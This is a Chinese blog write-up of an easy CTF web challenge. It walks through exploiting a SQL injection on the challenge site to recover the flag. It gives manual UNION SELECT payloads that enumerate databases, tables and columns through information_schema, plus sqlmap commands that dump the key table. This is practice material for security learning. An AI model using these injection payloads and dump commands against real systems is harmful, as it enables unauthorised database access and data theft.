CTF 这个看起来有点简单
2017-05-11 11:50
295 查看
这个看起来有点简单分值:10
来源: 西普学院难度:易
很明显。过年过节不送礼,送礼就送这个
格式:
解题链接: http://ctf5.shiyanbar.com/8/index.php?id=1
解法:
1.手工注入
id=1'
id=1 and 1=1
id=1 and 1=2 判断是sql注入
id=1 order by 2 两个字节
id=1 union select 1,2 回显2
爆数据库:
and 1=2 union select 1,schema_name from information_schema.schemata limit 0,2
information_schema my_db
爆表:
and 1=2 union select 1,table_name from information_schema.tables where table_schema=0x6d795f6462 limit 0,2
news thiskey
爆字段:
and 1=2 union select 1,column_name from information_schema.columns where table_schema=0x6d795f6462 limit 0,3
id content k0y
爆内容:
and 1=2 union select 1,k0y from thiskey
key=> whati0MyD9ldump
sqlmap解法:
列 数据库:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" --dbs
列表:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db --tables
列字段:
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey --columns
这个跑不出来。直接用下面的可以,但是需要知道k0y。
sqlmap -u "http://ctf5.shiyanbar.com/8/index.php?id=1" -D my_db -T thiskey -C k0y --dump
得出结果,但是需要把1改为l,不知道为什么。
相关文章推荐
- CTF 这个看起来有点简单!
- CTF---Web入门第三题 这个看起来有点简单!
- ctf-----这个看起来有点简单
- 决斗场 - 实验吧 WEB 这个看起来有点简单!
- 这个看起来有点简单!--实验吧
- 实验吧 Web 这个看起来有点简单! Writeup
- 我的分页控件算法,稍有点简单
- (忽然觉得,我的这个博客更像是记录我生活的日常博客,而不是技术,这与CSDN的技术风格,有点相悖,嘿嘿)
- S9T9查看下代码 猛然发现目前的这个代码有点奇怪
- 一些比较简单的存储过程的代码,主要是本人对这个东西不太熟,特地写下来!
- Android 如何让EditText不自动获取焦点 在项目中,一进入一个页面, EditText默认就会自动获取焦点。 那么如何取消这个默认行为呢? 在网上找了好久,有点 监听软键盘事件
- 都有点忘记这个BLOG了
- 关于系统的操作全在这里了。这个看起来很重要。
- IDF-CTF-简单的js加密 writeup
- redis是个单线程的程序,为什么会这么快呢?每秒10000?这个有点不解,具体是快在哪里呢?EPOLL?内存?
- 这个冬天有点长
- jquery让两个div高度自动适应 不用再看别的方法了 这个最简单
- 旅游优惠题。这个比较简单
- 纪念一下这个简单却改了好几遍的小代码。。。
- 《这个张飞有点雷》(序言)